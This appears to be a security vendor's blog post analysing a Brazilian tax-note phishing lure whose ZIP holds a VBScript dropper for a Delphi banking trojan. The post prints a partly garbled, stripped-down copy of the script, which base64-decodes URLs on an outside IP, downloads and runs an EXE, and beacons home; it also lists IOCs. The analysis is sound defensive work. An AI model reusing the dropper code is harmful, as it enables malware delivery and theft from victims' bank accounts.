It’s a Small World After All

The other day I decided to take a walkabout in our data and explore what the rest of the world sees. And it didn’t take long to find a poorly constructed Brazilian tax note phish spoofing their Ministry of Economy. The actor failed with his phish template and switches between an invoice phish and a tax note phish.

As you have probably guessed, that link does not go to the Ministry of Economy nor is it an electronic tax note. In fact, it downloads a ZIP file containing a VBScript. The script is minimally obfuscated and rather simple, so I will only provide a stripped-down version.

Set objShellSW = CreateObject( "WScript.Shell" )    
noqrtvvwyyABBDEEGIJ =objShellSW.ExpandEnvironmentStrings("%APPDATA%")
Set wshShell = CreateObject("WScript.Shell")
BBDEGIIJLNNOQQRTTV = noqrtvvwyyABBDEEGIJ +"\realteknv"
msgbox "   FILE  NOT  FOUND    "  ,vbInformation,"Windows"
Dim oFSO
Set oFSO = CreateObject("Scripting.FileSystemObject")
Zbccgghjjlmmoqrrtu = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9ncmwv")
uuwyzBBDEGGHJJLMO = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9iYzUyNzllOC0zNGFjLTRkMTYtYThmMi1iOWJkOTA0NDhhMC56aXA")
Set fso = CreateObject("Scripting.FileSystemObject")
sourceFile = fso.GetAbsolutePathName(ZipFile)
destFolder = fso.GetAbsolutePathName(ExtractTo)
Set objShell = CreateObject("Shell.Application")
Set FilesInZip=objShell.NameSpace(sourceFile).Items()
objShell.NameSpace(destFolder).copyHere FilesInZip, 4
Set objFSOx = Createobject("Scripting.FileSystemObject")
If objFSOx.Fileexists(BBDEGIIJLNNOQQRTTV  & "\") Then objFSOx.DeleteFile BBDEGIIJLNNOQQRTTV  & "\"
Set objFSOw = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSOw.GetFolder(objStartFolder)
Set colFiles = objFolder.Files
Dim objShellLM
Set objShellLM = WScript.CreateObject( "WScript.Shell" )
For Each objFile in colFiles
If UCase(objFSOw.GetExtensionName( = "EXE" Then
wyABDFFGIIJLNNOQQST = Replace(objFile.Name,".exe","")                                               
ffgiklnnpqsstvvxy = BBDEGIIJLNNOQQRTTV & "\" & objFile.Name
End If
Dim o
Set o = CreateObject("MSXML2.XMLHTTP") "GET", Zbccgghjjlmmoqrrtu, False

The script starts by base64 decoding those two strings, which decode to (1) hxxp://3.81.170[.]195/grl/ and (2) hxxp://3.81.170[.]195/ Then it downloads the payload from (1), extracts the EXE from the ZIP archive, removes the extension, and executes the payload. And, finally, it sends a GET request to (2).

And what sort of goodness does that payload deliver. Well it is a Brazilian phish so you would be correct if you said generic Delphi based Brazilian banking trojan. Many anti-virus vendors label them Banload, Boleto, or Delf.

IOCTypeNotes IP AddressC2 Address
dcd9ce1d719c4c7f3a06aaf320dd57f20fd9c228f21d56b118b1d28a726eecaeSHA256Zip file
1085cc04386f819f56f56ce15f63bff09336b44785ab93e7f75c073282c07e6cSHA256Banking trojan


All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.